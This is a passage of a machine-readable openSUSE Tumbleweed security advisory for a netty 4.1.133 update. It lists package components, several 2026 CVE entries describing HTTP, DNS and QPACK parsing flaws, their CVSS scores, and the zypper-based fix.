},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x"
},
"product_reference": "netty-bom-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-bom-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64"
},
"product_reference": "netty-bom-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64"
},
"product_reference": "netty-javadoc-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-javadoc-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x"
},
"product_reference": "netty-javadoc-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-javadoc-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64"
},
"product_reference": "netty-javadoc-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64"
},
"product_reference": "netty-parent-4.1.133-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le"
},
"product_reference": "netty-parent-4.1.133-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x"
},
"product_reference": "netty-parent-4.1.133-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "netty-parent-4.1.133-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
},
"product_reference": "netty-parent-4.1.133-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-41417",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-41417"
}
],
"notes": [
{
"category": "general",
"text": "Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests, leading to HTTP request smuggling or desynchronization on the HTTP side and request injection on the RTSP side. This issue is fixed in versions 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-41417",
"url": "https://www.suse.com/security/cve/CVE-2026-41417"
},
{
"category": "external",
"summary": "SUSE Bug 1264350 for CVE-2026-41417",
"url": "https://bugzilla.suse.com/1264350"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-41417"
},
{
"cve": "CVE-2026-42578",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42578"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42578",
"url": "https://www.suse.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "SUSE Bug 1265243 for CVE-2026-42578",
"url": "https://bugzilla.suse.com/1265243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42578"
},
{
"cve": "CVE-2026-42579",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42579"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s DNS codec does not enforce RFC 1035 domain name constraints during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42579",
"url": "https://www.suse.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "SUSE Bug 1265272 for CVE-2026-42579",
"url": "https://bugzilla.suse.com/1265272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42579"
},
{
"cve": "CVE-2026-42580",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42580"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s chunk size parser silently overflows int, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42580",
"url": "https://www.suse.com/security/cve/CVE-2026-42580"
},
{
"category": "external",
"summary": "SUSE Bug 1265273 for CVE-2026-42580",
"url": "https://bugzilla.suse.com/1265273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42580"
},
{
"cve": "CVE-2026-42581",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42581"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42581",
"url": "https://www.suse.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "SUSE Bug 1265277 for CVE-2026-42581",
"url": "https://bugzilla.suse.com/1265277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42581"
},
{
"cve": "CVE-2026-42582",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42582"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length \u003c= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42582",
"url": "https://www.suse.com/security/cve/CVE-2026-42582"
},
{
"category": "external",
"summary": "SUSE Bug 1265318 for CVE-2026-42582",
"url": "https://bugzilla.suse.com/1265318"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
